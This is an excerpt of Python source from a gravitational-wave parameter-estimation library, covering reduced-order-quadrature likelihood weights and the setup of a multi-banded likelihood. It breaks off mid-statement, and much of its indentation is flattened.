        # Return effectively -inf (d|h) so this sample is rejected.
        return self._CalculatedSNRs(
            d_inner_h=np.nan_to_num(-np.inf), optimal_snr_squared=0,
            complex_matched_filter_snr=np.nan_to_num(-np.inf),
            d_inner_h_squared_tc_array=None,
            d_inner_h_array=None,
            optimal_snr_squared_array=None)
    d_inner_h_tc_array = np.einsum(
        'i,ji->j', np.conjugate(h_plus_linear + h_cross_linear),
        self.weights[interferometer.name + '_linear'][indices])
    d_inner_h = self._interp_five_samples(
        self.weights['time_samples'][indices], d_inner_h_tc_array, ifo_time)
    optimal_snr_squared = \
        np.vdot(np.abs(h_plus_quadratic + h_cross_quadratic)**2,
                self.weights[interferometer.name + '_quadratic'])
    # Guard against invalid-value warnings when (h|h) is zero.
    with np.errstate(invalid="ignore"):
        complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
    d_inner_h_squared_tc_array = None
    return self._CalculatedSNRs(
        d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
        complex_matched_filter_snr=complex_matched_filter_snr,
        d_inner_h_squared_tc_array=d_inner_h_squared_tc_array,
        d_inner_h_array=None,
        optimal_snr_squared_array=None)
@staticmethod
def _closest_time_indices(time, samples):
    """
    Get the closest five times

    Parameters
    ==========
    time: float
        Time to check
    samples: array-like
        Available times; a uniform spacing is assumed (the spacing is
        computed from the first two samples only)

    Returns
    =======
    indices: list
        Indices nearest to time
    in_bounds: bool
        Whether the indices are for valid times
    """
    # Index of the sample just below `time`, assuming uniform spacing.
    closest = int((time - samples[0]) / (samples[1] - samples[0]))
    # Five-point stencil centred on the closest sample.
    indices = [closest + ii for ii in [-2, -1, 0, 1, 2]]
    in_bounds = (indices[0] >= 0) & (indices[-1] < samples.size)
    return indices, in_bounds
@staticmethod
def _interp_five_samples(time_samples, values, time):
    """
    Interpolate a function of time with its values at the closest five times.
    The algorithm is explained in https://dcc.ligo.org/T2100224.

    Parameters
    ==========
    time_samples: array-like
        Closest 5 times
    values: array-like
        The values of the function at closest 5 times
    time: float
        Time at which the function is calculated

    Returns
    =======
    value: float
        The value of the function at the input time
    """
    # Finite-difference correction terms built from the 5-point stencil.
    r1 = (-values[0] + 8. * values[1] - 14. * values[2] + 8. * values[3] - values[4]) / 4.
    r2 = values[2] - 2. * values[3] + values[4]
    # Fractional position of `time` between the two central samples.
    # NOTE(review): uses time_samples[3] with the [1]-[0] spacing, which is
    # consistent only for a uniform grid — confirm against T2100224.
    a = (time_samples[3] - time) / (time_samples[1] - time_samples[0])
    b = 1. - a
    c = (a**3. - a) / 6.
    d = (b**3. - b) / 6.
    return a * values[2] + b * values[3] + c * r1 + d * r2
def perform_roq_params_check(self, ifo=None):
    """ Perform checking that the prior and data are valid for the ROQ

    Compares the detector frequency range and duration, and the prior chirp
    and component mass bounds, against the (scaled) ROQ basis parameters.

    Parameters
    ==========
    ifo: bilby.gw.detector.Interferometer
        The interferometer

    Raises
    ======
    BilbyROQParamsRangeError: when the data or priors fall outside the
        validity range of the ROQ basis.
    """
    if self.roq_params_check is False:
        logger.warning("No ROQ params checking performed")
        return
    else:
        if getattr(self, "roq_params_file", None) is not None:
            msg = ("Check ROQ params {} with roq_scale_factor={}"
                   .format(self.roq_params_file, self.roq_scale_factor))
        else:
            msg = ("Check ROQ params with roq_scale_factor={}"
                   .format(self.roq_scale_factor))
        logger.info(msg)
    roq_params = self.roq_params
    # Frequencies scale up, durations and masses scale down with the
    # ROQ scale factor.
    roq_minimum_frequency = roq_params['flow'] * self.roq_scale_factor
    roq_maximum_frequency = roq_params['fhigh'] * self.roq_scale_factor
    roq_segment_length = roq_params['seglen'] / self.roq_scale_factor
    roq_minimum_chirp_mass = roq_params['chirpmassmin'] / self.roq_scale_factor
    roq_maximum_chirp_mass = roq_params['chirpmassmax'] / self.roq_scale_factor
    roq_minimum_component_mass = roq_params['compmin'] / self.roq_scale_factor
    if ifo.maximum_frequency > roq_maximum_frequency:
        raise BilbyROQParamsRangeError(
            "Requested maximum frequency {} larger than ROQ basis fhigh {}"
            .format(ifo.maximum_frequency, roq_maximum_frequency))
    if ifo.minimum_frequency < roq_minimum_frequency:
        raise BilbyROQParamsRangeError(
            "Requested minimum frequency {} lower than ROQ basis flow {}"
            .format(ifo.minimum_frequency, roq_minimum_frequency))
    if ifo.strain_data.duration != roq_segment_length:
        raise BilbyROQParamsRangeError(
            "Requested duration differs from ROQ basis seglen")
    priors = self.priors
    if isinstance(priors, CBCPriorDict) is False:
        logger.warning("Unable to check ROQ parameter bounds: priors not understood")
        return
    if priors.minimum_chirp_mass is None:
        logger.warning("Unable to check minimum chirp mass ROQ bounds")
    elif priors.minimum_chirp_mass < roq_minimum_chirp_mass:
        raise BilbyROQParamsRangeError(
            "Prior minimum chirp mass {} less than ROQ basis bound {}"
            .format(priors.minimum_chirp_mass,
                    roq_minimum_chirp_mass))
    if priors.maximum_chirp_mass is None:
        logger.warning("Unable to check maximum_chirp mass ROQ bounds")
    elif priors.maximum_chirp_mass > roq_maximum_chirp_mass:
        raise BilbyROQParamsRangeError(
            "Prior maximum chirp mass {} greater than ROQ basis bound {}"
            .format(priors.maximum_chirp_mass,
                    roq_maximum_chirp_mass))
    if priors.minimum_component_mass is None:
        logger.warning("Unable to check minimum component mass ROQ bounds")
    elif priors.minimum_component_mass < roq_minimum_component_mass:
        raise BilbyROQParamsRangeError(
            "Prior minimum component mass {} less than ROQ basis bound {}"
            .format(priors.minimum_component_mass,
                    roq_minimum_component_mass))
def _set_weights(self, linear_matrix, quadratic_matrix):
    """
    Setup the time-dependent ROQ weights.
    See https://dcc.ligo.org/LIGO-T2100125 for the detail of how to compute them.

    Parameters
    ==========
    linear_matrix, quadratic_matrix: array_like
        Arrays of the linear and quadratic basis
    """
    time_space = self._get_time_resolution()
    number_of_time_samples = int(self.interferometers.duration / time_space)
    # Prefer pyfftw for the inverse FFT; fall back to numpy when missing.
    try:
        import pyfftw
        ifft_input = pyfftw.empty_aligned(number_of_time_samples, dtype=complex)
        ifft_output = pyfftw.empty_aligned(number_of_time_samples, dtype=complex)
        ifft = pyfftw.FFTW(ifft_input, ifft_output, direction='FFTW_BACKWARD')
    except ImportError:
        pyfftw = None
        logger.warning("You do not have pyfftw installed, falling back to numpy.fft.")
        ifft_input = np.zeros(number_of_time_samples, dtype=complex)
        ifft = np.fft.ifft
    # Only keep time samples covering the time prior, padded by the maximum
    # Earth-crossing light travel time plus a few grid steps.
    earth_light_crossing_time = 2 * radius_of_earth / speed_of_light + 5 * time_space
    start_idx = max(0, int(np.floor((self.priors['{}_time'.format(self.time_reference)].minimum -
                    earth_light_crossing_time - self.interferometers.start_time) / time_space)))
    end_idx = min(number_of_time_samples - 1, int(np.ceil((
                  self.priors['{}_time'.format(self.time_reference)].maximum + earth_light_crossing_time -
                  self.interferometers.start_time) / time_space)))
    self.weights['time_samples'] = np.arange(start_idx, end_idx + 1) * time_space
    logger.info("Using {} ROQ time samples".format(len(self.weights['time_samples'])))
    for ifo in self.interferometers:
        if self.roq_params is not None:
            self.perform_roq_params_check(ifo)
            # Get scaled ROQ quantities
            roq_scaled_minimum_frequency = self.roq_params['flow'] * self.roq_scale_factor
            roq_scaled_maximum_frequency = self.roq_params['fhigh'] * self.roq_scale_factor
            roq_scaled_segment_length = self.roq_params['seglen'] / self.roq_scale_factor
            # Generate frequencies for the ROQ
            roq_frequencies = create_frequency_series(
                sampling_frequency=roq_scaled_maximum_frequency * 2,
                duration=roq_scaled_segment_length)
            roq_mask = roq_frequencies >= roq_scaled_minimum_frequency
            roq_frequencies = roq_frequencies[roq_mask]
            # Indices where the detector and basis frequency grids coincide.
            overlap_frequencies, ifo_idxs, roq_idxs = np.intersect1d(
                ifo.frequency_array[ifo.frequency_mask], roq_frequencies,
                return_indices=True)
        else:
            overlap_frequencies = ifo.frequency_array[ifo.frequency_mask]
            roq_idxs = np.arange(linear_matrix.shape[0], dtype=int)
            ifo_idxs = np.arange(sum(ifo.frequency_mask))
            if len(ifo_idxs) != len(roq_idxs):
                raise ValueError(
                    "Mismatch between ROQ basis and frequency array for "
                    "{}".format(ifo.name))
        logger.info(
            "Building ROQ weights for {} with {} frequencies between {} "
            "and {}.".format(
                ifo.name, len(overlap_frequencies),
                min(overlap_frequencies), max(overlap_frequencies)))
        ifft_input[:] *= 0.
        self.weights[ifo.name + '_linear'] = \
            np.zeros((len(self.weights['time_samples']), linear_matrix.shape[1]), dtype=complex)
        # Whitened data restricted to the overlapping frequencies.
        data_over_psd = ifo.frequency_domain_strain[ifo.frequency_mask][ifo_idxs] / \
            ifo.power_spectral_density_array[ifo.frequency_mask][ifo_idxs]
        # Offset of the overlap bins within the full-length FFT input.
        nonzero_idxs = ifo_idxs + int(ifo.frequency_array[ifo.frequency_mask][0] * self.interferometers.duration)
        # One inverse FFT per linear basis element gives the weight as a
        # function of time; only the retained time window is stored.
        for i, basis_element in enumerate(linear_matrix[roq_idxs].T):
            ifft_input[nonzero_idxs] = data_over_psd * np.conj(basis_element)
            self.weights[ifo.name + '_linear'][:, i] = ifft(ifft_input)[start_idx:end_idx + 1]
        self.weights[ifo.name + '_linear'] *= 4. * number_of_time_samples / self.interferometers.duration
        self.weights[ifo.name + '_quadratic'] = build_roq_weights(
            1 /
            ifo.power_spectral_density_array[ifo.frequency_mask][ifo_idxs],
            quadratic_matrix[roq_idxs].real,
            1 / ifo.strain_data.duration)
        logger.info("Finished building weights for {}".format(ifo.name))
    if pyfftw is not None:
        pyfftw.forget_wisdom()
def save_weights(self, filename, format='npz'):
    """Save the ROQ weights to ``filename`` in json or npz format.

    Parameters
    ==========
    filename: str
        Output path; the format extension is appended when missing.
    format: str
        Either 'json' or 'npz' (default).

    Raises
    ======
    IOError: when ``format`` is not one of the supported formats (matching
        the behaviour of ``load_weights``; previously an unknown format
        silently wrote nothing).
    """
    if format not in ["json", "npz"]:
        raise IOError("Format {} not recognized.".format(format))
    # Append the extension only when the filename does not already end with
    # it; the previous substring test ('format not in filename') wrongly
    # skipped appending for names merely containing the format string
    # (e.g. 'my_json_weights'), which then broke load_weights' inference of
    # the format from the extension.
    if not filename.endswith("." + format):
        filename += "." + format
    logger.info("Saving ROQ weights to {}".format(filename))
    if format == 'json':
        with open(filename, 'w') as file:
            json.dump(self.weights, file, indent=2, cls=BilbyJsonEncoder)
    elif format == 'npz':
        np.savez(filename, **self.weights)
@staticmethod
def load_weights(filename, format=None):
    """Load ROQ weights from a json or npz file.

    The format is inferred from the filename extension when not given.

    Raises
    ======
    IOError: when the format is not 'json' or 'npz'.
    """
    if format is None:
        format = filename.split(".")[-1]
    if format not in ["json", "npz"]:
        raise IOError("Format {} not recognized.".format(format))
    logger.info("Loading ROQ weights from {}".format(filename))
    if format == "json":
        with open(filename, 'r') as file:
            return json.load(file, object_hook=decode_bilby_json)
    # Wrap in dict to load data into memory
    return dict(np.load(filename))
def _get_time_resolution(self):
    """
    This method estimates the time resolution given the optimal SNR of the
    signal in the detector. This is then used when constructing the weights
    for the ROQ.

    A minimum resolution is set by assuming the SNR in each detector is at
    least 10. When the SNR is not available the SNR is assumed to be 30 in
    each detector.

    Returns
    =======
    delta_t: float
        Time resolution
    """
    def calc_fhigh(freq, psd, scaling=20.):
        """Return the SNR-weighted maximum frequency to resolve.

        Parameters
        ==========
        freq: array-like
            Frequency array
        psd: array-like
            Power spectral density
        scaling: float
            SNR dependent scaling factor

        Returns
        =======
        f_high: float
            The maximum frequency which must be considered
        """
        # NOTE(review): scipy.integrate.simps is a deprecated alias removed
        # in recent scipy releases (use `simpson`) — confirm the pinned
        # scipy version still provides it.
        from scipy.integrate import simps
        integrand1 = np.power(freq, -7. / 3) / psd
        integral1 = simps(integrand1, freq)
        integrand3 = np.power(freq, 2. / 3.) / (psd * integral1)
        f_3_bar = simps(integrand3, freq)
        f_high = scaling * f_3_bar**(1 / 3)
        return f_high

    def c_f_scaling(snr):
        # SNR-dependent scaling factor for the frequency cut-off.
        return (np.pi**2 * snr**2 / 6)**(1 / 3)

    # Network SNR squared, with a per-detector floor of 10 and a default
    # of 30 when no optimal SNR is recorded.
    inj_snr_sq = 0
    for ifo in self.interferometers:
        inj_snr_sq += max(10, ifo.meta_data.get('optimal_SNR', 30))**2
    # NOTE(review): psd/freq are taken from the last interferometer in the
    # loop above — confirm this is intended rather than a network average.
    psd = ifo.power_spectral_density_array[ifo.frequency_mask]
    freq = ifo.frequency_array[ifo.frequency_mask]
    fhigh = calc_fhigh(freq, psd, scaling=c_f_scaling(inj_snr_sq**0.5))
    delta_t = fhigh**-1
    # Apply a safety factor to ensure the time step is short enough
    delta_t = delta_t / 5
    # duration / delta_t needs to be a power of 2 for IFFT
    number_of_time_samples = max(
        self.interferometers.duration / delta_t,
        self.interferometers.frequency_array[-1] * self.interferometers.duration + 1)
    number_of_time_samples = int(2**np.ceil(np.log2(number_of_time_samples)))
    delta_t = self.interferometers.duration / number_of_time_samples
    logger.info("ROQ time-step = {}".format(delta_t))
    return delta_t
def _rescale_signal(self, signal, new_distance):
    """Rescale both the linear and quadratic ROQ waveform components in
    place from the reference distance to ``new_distance``."""
    for kind in ['linear', 'quadratic']:
        for mode in signal[kind]:
            signal[kind][mode] *= self._ref_dist / new_distance
def get_binary_black_hole_likelihood(interferometers):
    """ A wrapper to quickly set up a likelihood for BBH parameter estimation

    Uses the IMRPhenomPv2 approximant with a 50 Hz reference frequency and no
    marginalization.

    Parameters
    ==========
    interferometers: {bilby.gw.detector.InterferometerList, list}
        A list of `bilby.detector.Interferometer` instances, typically the
        output of either `bilby.detector.get_interferometer_with_open_data`
        or `bilby.detector.get_interferometer_with_fake_noise_and_injection`

    Returns
    =======
    bilby.GravitationalWaveTransient: The likelihood to pass to `run_sampler`
    """
    waveform_arguments = {'waveform_approximant': 'IMRPhenomPv2',
                          'reference_frequency': 50}
    generator = WaveformGenerator(
        duration=interferometers.duration,
        sampling_frequency=interferometers.sampling_frequency,
        frequency_domain_source_model=lal_binary_black_hole,
        waveform_arguments=waveform_arguments)
    return GravitationalWaveTransient(interferometers, generator)
class BilbyROQParamsRangeError(Exception):
    """Raised when the data or priors fall outside the validity range of the
    ROQ basis (see ``perform_roq_params_check``)."""
    pass
class MBGravitationalWaveTransient(GravitationalWaveTransient):
"""A multi-banded likelihood object
    This uses the method described in Morisaki, 2021, arXiv: 2104.07813.
Parameters
----------
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal, given some set of parameters
reference_chirp_mass: float
A reference chirp mass for determining the frequency banding
highest_mode: int, optional
The maximum magnetic number of gravitational-wave moments. Default is 2
linear_interpolation: bool, optional
If True, the linear-interpolation method is used for the computation of (h, h). If False, the IFFT-FFT method
is used. Default is True.
accuracy_factor: float, optional
A parameter to determine the accuracy of multi-banding. The larger this factor is, the more accurate the
approximation is. This corresponds to L in the paper. Default is 5.
time_offset: float, optional
(end time of data) - (maximum arrival time). If None, it is inferred from the prior of geocent time.
delta_f_end: float, optional
The frequency scale with which waveforms at the high-frequency end are smoothed. If None, it is determined from
the prior of geocent time.
maximum_banding_frequency: float, optional
A maximum frequency for multi-banding. If specified, the low-frequency limit of a band does not exceed it.
minimum_banding_duration: float, optional
A minimum duration for multi-banding. If specified, the duration of a band is not smaller than it.
distance_marginalization: bool, optional
If true, marginalize over distance in the likelihood. This uses a look up table calculated at run time. The
distance prior is set to be a delta function at the minimum distance allowed in the prior being marginalised
over.
phase_marginalization: bool, optional
If true, marginalize over phase in the likelihood. This is done analytically using a Bessel function. The phase
prior is set to be a delta function at phase=0.
priors: dict, bilby.prior.PriorDict
A dictionary of priors containing at least the geocent_time prior
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array, (distance) prior_array, and
reference_distance used to construct the table. If a string the name of a file containing these quantities. The
lookup table is stored after construction in either the provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- "sky": sample in RA/dec, this is the default
- e.g., "H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"]):
          sample in azimuth and zenith, `azimuth` and `zenith` defined in the frame where the z-axis is aligned with the
vector connecting H1 and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- "geocent"/"geocenter": sample in the time at the Earth's center, this is the default
- e.g., "H1": sample in the time of arrival at H1
Returns
-------
Likelihood: `bilby.core.likelihood.Likelihood`
A likelihood object, able to compute the likelihood of the data given some model parameters
"""
    def __init__(
            self, interferometers, waveform_generator, reference_chirp_mass, highest_mode=2, linear_interpolation=True,
            accuracy_factor=5, time_offset=None, delta_f_end=None, maximum_banding_frequency=None,
            minimum_banding_duration=0., distance_marginalization=False, phase_marginalization=False, priors=None,
            distance_marginalization_lookup_table=None, reference_frame="sky", time_reference="geocenter"
    ):
        # Multi-banding does not support time marginalization or time jitter,
        # so both are hard-coded off in the parent constructor.
        super(MBGravitationalWaveTransient, self).__init__(
            interferometers=interferometers, waveform_generator=waveform_generator, priors=priors,
            distance_marginalization=distance_marginalization, phase_marginalization=phase_marginalization,
            time_marginalization=False, distance_marginalization_lookup_table=distance_marginalization_lookup_table,
            jitter_time=False, reference_frame=reference_frame, time_reference=time_reference
        )
        # Each assignment below goes through a validating property setter; the
        # order matters because later setters read earlier attributes (e.g. the
        # maximum_banding_frequency setter uses highest_mode and the reference
        # chirp mass, and time_offset/delta_f_end read self.priors).
        self.reference_chirp_mass = reference_chirp_mass
        self.highest_mode = highest_mode
        self.linear_interpolation = linear_interpolation
        self.accuracy_factor = accuracy_factor
        self.time_offset = time_offset
        self.delta_f_end = delta_f_end
        # Overall analysis band: widest range covered by any interferometer.
        self.minimum_frequency = np.min([i.minimum_frequency for i in self.interferometers])
        self.maximum_frequency = np.max([i.maximum_frequency for i in self.interferometers])
        self.maximum_banding_frequency = maximum_banding_frequency
        self.minimum_banding_duration = minimum_banding_duration
        # Precompute bands, frequency points and inner-product coefficients.
        self.setup_multibanding()
@property
def reference_chirp_mass(self):
return self._reference_chirp_mass
@property
def reference_chirp_mass_in_second(self):
return gravitational_constant * self._reference_chirp_mass * solar_mass / speed_of_light**3.
@reference_chirp_mass.setter
def reference_chirp_mass(self, reference_chirp_mass):
if isinstance(reference_chirp_mass, int) or isinstance(reference_chirp_mass, float):
self._reference_chirp_mass = reference_chirp_mass
else:
raise TypeError("reference_chirp_mass must be a number")
@property
def highest_mode(self):
return self._highest_mode
@highest_mode.setter
def highest_mode(self, highest_mode):
if isinstance(highest_mode, int) or isinstance(highest_mode, float):
self._highest_mode = highest_mode
else:
raise TypeError("highest_mode must be a number")
@property
def linear_interpolation(self):
return self._linear_interpolation
@linear_interpolation.setter
def linear_interpolation(self, linear_interpolation):
if isinstance(linear_interpolation, bool):
self._linear_interpolation = linear_interpolation
else:
raise TypeError("linear_interpolation must be a bool")
@property
def accuracy_factor(self):
return self._accuracy_factor
@accuracy_factor.setter
def accuracy_factor(self, accuracy_factor):
if isinstance(accuracy_factor, int) or isinstance(accuracy_factor, float):
self._accuracy_factor = accuracy_factor
else:
raise TypeError("accuracy_factor must be a number")
@property
def time_offset(self):
return self._time_offset
@time_offset.setter
def time_offset(self, time_offset):
"""
This sets the time offset assumed when frequency bands are constructed. The default value is (the
maximum offset of geocent time in the prior range) + (light-traveling time of the Earth). If the
prior does not contain 'geocent_time', 2.12 seconds is used. It is calculated assuming that the
maximum offset of geocent time is 2.1 seconds, which is the value for the standard prior used by
LIGO-Virgo-KAGRA.
"""
time_parameter = self.time_reference + "_time"
if time_parameter == "geocent_time":
safety = radius_of_earth / speed_of_light
else:
safety = 2 * radius_of_earth / speed_of_light
if time_offset is not None:
if isinstance(time_offset, int) or isinstance(time_offset, float):
self._time_offset = time_offset
else:
raise TypeError("time_offset must be a number")
elif self.priors is not None and time_parameter in self.priors:
self._time_offset = (
self.interferometers.start_time + self.interferometers.duration
- self.priors[time_parameter].minimum + safety
)
else:
self._time_offset = 2.12
logger.warning("time offset can not be inferred. Use the standard time offset of {} seconds.".format(
self._time_offset))
@property
def delta_f_end(self):
return self._delta_f_end
@delta_f_end.setter
def delta_f_end(self, delta_f_end):
"""
This sets the frequency scale of tapering the high-frequency end of waveform, to avoid the issues of
abrupt termination of waveform described in Sec. 2. F of arXiv: 2104.07813. This needs to be much
larger than the inverse of the minimum time offset, and the default value is 100 times of that. If
the prior does not contain 'geocent_time' and the minimum time offset can not be computed, 53Hz is
used. It is computed assuming that the minimum offset of geocent time is 1.9 seconds, which is the
value for the standard prior used by LIGO-Virgo-KAGRA.
"""
time_parameter = self.time_reference + "_time"
if time_parameter == "geocent_time":
safety = radius_of_earth / speed_of_light
else:
safety = 2 * radius_of_earth / speed_of_light
if delta_f_end is not None:
if isinstance(delta_f_end, int) or isinstance(delta_f_end, float):
self._delta_f_end = delta_f_end
else:
raise TypeError("delta_f_end must be a number")
elif self.priors is not None and time_parameter in self.priors:
self._delta_f_end = 100 / (
self.interferometers.start_time + self.interferometers.duration
- self.priors[time_parameter].maximum - safety
)
else:
self._delta_f_end = 53.
logger.warning("delta_f_end can not be inferred. Use the standard delta_f_end of {} Hz.".format(
self._delta_f_end))
@property
def maximum_banding_frequency(self):
return self._maximum_banding_frequency
@maximum_banding_frequency.setter
def maximum_banding_frequency(self, maximum_banding_frequency):
"""
This sets the upper limit on a starting frequency of a band. The default value is the frequency at
which f - 1 / \sqrt(- d\tau / df) starts to decrease, because the bisection search of the starting
frequency does not work from that frequency. The stationary phase approximation is not valid at such
a high frequency, which can break down the approximation. It is calculated from the 0PN formula of
time-to-merger \tau(f). The user-specified frequency is used if it is lower than that frequency.
"""
fmax_tmp = (
(15 / 968)**(3 / 5) * (self.highest_mode / (2 * np.pi))**(8 / 5)
/ self.reference_chirp_mass_in_second
)
if maximum_banding_frequency is not None:
if isinstance(maximum_banding_frequency, int) or isinstance(maximum_banding_frequency, float):
if maximum_banding_frequency < fmax_tmp:
fmax_tmp = maximum_banding_frequency
else:
logger.warning("The input maximum_banding_frequency is too large."
"It is set to be {} Hz.".format(fmax_tmp))
else:
raise TypeError("maximum_banding_frequency must be a number")
self._maximum_banding_frequency = fmax_tmp
@property
def minimum_banding_duration(self):
return self._minimum_banding_duration
@minimum_banding_duration.setter
def minimum_banding_duration(self, minimum_banding_duration):
if isinstance(minimum_banding_duration, int) or isinstance(minimum_banding_duration, float):
self._minimum_banding_duration = minimum_banding_duration
else:
raise TypeError("minimum_banding_duration must be a number")
    def setup_multibanding(self):
        """Set up frequency bands and coefficients needed for likelihood evaluations"""
        # The order matters: each step consumes instance variables produced by
        # the previous one (bands -> sample counts -> frequency points -> coefficients).
        self._setup_frequency_bands()
        self._setup_integers()
        self._setup_waveform_frequency_points()
        self._setup_linear_coefficients()
        # (h, h) coefficients depend on which algorithm was requested.
        if self.linear_interpolation:
            self._setup_quadratic_coefficients_linear_interp()
        else:
            self._setup_quadratic_coefficients_ifft_fft()
def _tau(self, f):
"""Compute time-to-merger from the input frequency. This uses the 0PN formula.
Parameters
----------
f: float
input frequency
Returns
-------
tau: float
time-to-merger
"""
f_22 = 2. * f / self.highest_mode
return 5. / 256. * self.reference_chirp_mass_in_second * \
(np.pi * self.reference_chirp_mass_in_second * f_22)**(-8. / 3.)
def _dtaudf(self, f):
"""Compute the derivative of time-to-merger with respect to a starting frequency. This uses the 0PN formula.
Parameters
----------
f: float
input frequency
Returns
-------
dtaudf: float
derivative of time-to-merger
"""
f_22 = 2. * f / self.highest_mode
return -5. / 96. * self.reference_chirp_mass_in_second * \
(np.pi * self.reference_chirp_mass_in_second * f_22)**(-8. / 3.) / f
def _find_starting_frequency(self, duration, fnow):
"""Find the starting frequency of the next band satisfying (10) and
(51) of arXiv: 2104.07813.
Parameters
----------
duration: float
duration of the next band
fnow: float
starting frequency of the current band
Returns
-------
fnext: float or None
starting frequency of the next band. None if a frequency satisfying the conditions does not exist.
dfnext: float or None
frequency scale with which waveforms are smoothed. None if a frequency satisfying the conditions does not
exist.
"""
def _is_above_fnext(f):
"This function returns True if f > fnext"
cond1 = duration - self.time_offset - self._tau(f) - \
self.accuracy_factor * np.sqrt(-self._dtaudf(f)) > 0.
cond2 = f - 1. / np.sqrt(-self._dtaudf(f)) - fnow > 0.
return cond1 and cond2
# Bisection search for fnext
fmin, fmax = fnow, self.maximum_banding_frequency
if not _is_above_fnext(fmax):
return None, None
while fmax - fmin > 1e-2 / duration:
f = (fmin + fmax) / 2.
if _is_above_fnext(f):
fmax = f
else:
fmin = f
return f, 1. / np.sqrt(-self._dtaudf(f))
    def _setup_frequency_bands(self):
        r"""Set up frequency bands. The durations of bands geometrically decrease T, T/2. T/4, ..., where T is the
        original duration. This sets the following instance variables.

        durations: durations of bands (T^(b) in the paper)
        fb_dfb: the list of tuples, which contain starting frequencies (f^(b) in the paper) and frequency scales for
            smoothing waveforms (\Delta f^(b) in the paper) of bands

        Note: the docstring is a raw string because \Delta is an invalid escape
        sequence in a non-raw literal.
        """
        # First band: the full duration, starting at the minimum frequency, no smoothing.
        self.durations = [self.interferometers.duration]
        self.fb_dfb = [(self.minimum_frequency, 0.)]
        dnext = self.interferometers.duration / 2
        # Keep halving the duration while a valid next band can be found and the
        # duration stays above the configured floor.
        while dnext > max(self.time_offset, self.minimum_banding_duration):
            fnow, _ = self.fb_dfb[-1]
            fnext, dfnext = self._find_starting_frequency(dnext, fnow)
            if fnext is not None and fnext < min(self.maximum_frequency, self.maximum_banding_frequency):
                self.durations.append(dnext)
                self.fb_dfb.append((fnext, dfnext))
                dnext /= 2
            else:
                break
        # Sentinel entry marking the high-frequency end of the last band.
        self.fb_dfb.append((self.maximum_frequency + self.delta_f_end, self.delta_f_end))
        logger.info("The total frequency range is divided into {} bands with frequency intervals of {}.".format(
            len(self.durations), ", ".join(["1/{} Hz".format(d) for d in self.durations])))
    def _setup_integers(self):
        """Set up integers needed for likelihood evaluations. This sets the following instance variables.

        Nbs: the numbers of samples of downsampled data (N^(b) in the paper)
        Mbs: the numbers of samples of shortened data (M^(b) in the paper)
        Ks_Ke: start and end frequency indices of bands (K^(b)_s and K^(b)_e in the paper)
        """
        self.Nbs = []
        self.Mbs = []
        self.Ks_Ke = []
        for b in range(len(self.durations)):
            dnow = self.durations[b]
            fnow, dfnow = self.fb_dfb[b]
            fnext, _ = self.fb_dfb[b + 1]
            # N^(b): power-of-two sample count covering frequencies up to the next
            # band start; at least 2**b so that M^(b) = N^(b) / 2**b is an integer >= 1.
            Nb = max(round_up_to_power_of_two(2. * (fnext * self.interferometers.duration + 1.)), 2**b)
            self.Nbs.append(Nb)
            self.Mbs.append(Nb // 2**b)
            # Frequency-bin indices of this band, from the smoothed lower edge
            # (fnow - dfnow) to the band end, at the band's resolution 1/dnow.
            self.Ks_Ke.append((math.ceil((fnow - dfnow) * dnow), math.floor(fnext * dnow)))
    def _setup_waveform_frequency_points(self):
        """Set up frequency points where waveforms are evaluated. Frequency points are reordered because some waveform
        models raise an error if the input frequencies are not increasing. This adds frequency_points into the
        waveform_arguments of waveform_generator. This sets the following instance variables.

        banded_frequency_points: ndarray of total banded frequency points
        start_end_idxs: list of tuples containing start and end indices of each band
        unique_to_original_frequencies: indices converting unique frequency
            points into the original duplicated banded frequencies
        """
        self.banded_frequency_points = np.array([])
        self.start_end_idxs = []
        start_idx = 0
        for i in range(len(self.fb_dfb) - 1):
            d = self.durations[i]
            Ks, Ke = self.Ks_Ke[i]
            # Band i contributes the frequencies Ks/d, (Ks+1)/d, ..., Ke/d.
            self.banded_frequency_points = np.append(self.banded_frequency_points, np.arange(Ks, Ke + 1) / d)
            end_idx = start_idx + Ke - Ks
            self.start_end_idxs.append((start_idx, end_idx))
            start_idx = end_idx + 1
        # Deduplicate and sort for the waveform generator; keep the inverse map
        # back to the (possibly duplicated) band-ordered points.
        unique_frequencies, idxs = np.unique(self.banded_frequency_points, return_inverse=True)
        self.waveform_generator.waveform_arguments['frequencies'] = unique_frequencies
        self.unique_to_original_frequencies = idxs
        logger.info("The number of frequency points where waveforms are evaluated is {}.".format(
            len(unique_frequencies)))
        logger.info("The speed-up gain of multi-banding is {}.".format(
            (self.maximum_frequency - self.minimum_frequency) * self.interferometers.duration /
            len(unique_frequencies)))
    def _window(self, f, b):
        """Compute window function in the b-th band

        Parameters
        ----------
        f: float or ndarray
            frequency at which the window function is computed
        b: int
            band index into fb_dfb

        Returns
        -------
        window: float
            window function at f
        """
        fnow, dfnow = self.fb_dfb[b]
        fnext, dfnext = self.fb_dfb[b + 1]
        @np.vectorize
        def _vectorized_window(f):
            # Cosine taper: rises over (fnow - dfnow, fnow), is flat at 1 on
            # [fnow, fnext - dfnext], falls over (fnext - dfnext, fnext),
            # and is 0 outside the band.
            if fnow - dfnow < f < fnow:
                return (1. + np.cos(np.pi * (f - fnow) / dfnow)) / 2.
            elif fnow <= f <= fnext - dfnext:
                return 1.
            elif fnext - dfnext < f < fnext:
                return (1. - np.cos(np.pi * (f - fnext) / dfnext)) / 2.
            else:
                return 0.
        return _vectorized_window(f)
    def _setup_linear_coefficients(self):
        """Set up coefficients by which waveforms are multiplied to compute (d, h)"""
        self.linear_coeffs = dict((ifo.name, np.array([])) for ifo in self.interferometers)
        N = self.Nbs[-1]
        for ifo in self.interferometers:
            logger.info("Pre-computing linear coefficients for {}".format(ifo.name))
            # Whitened data d(f) / S(f); zero outside the analysis band.
            fddata = np.zeros(N // 2 + 1, dtype=complex)
            fddata[:len(ifo.frequency_domain_strain)][ifo.frequency_mask] += \
